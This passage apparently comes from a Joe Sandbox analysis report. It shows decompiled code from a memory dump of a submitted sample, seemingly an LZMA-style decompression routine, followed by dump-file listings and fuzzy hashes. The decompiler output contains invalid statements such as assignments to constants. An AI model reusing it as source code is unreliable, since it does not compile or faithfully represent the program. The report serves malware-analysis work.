														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
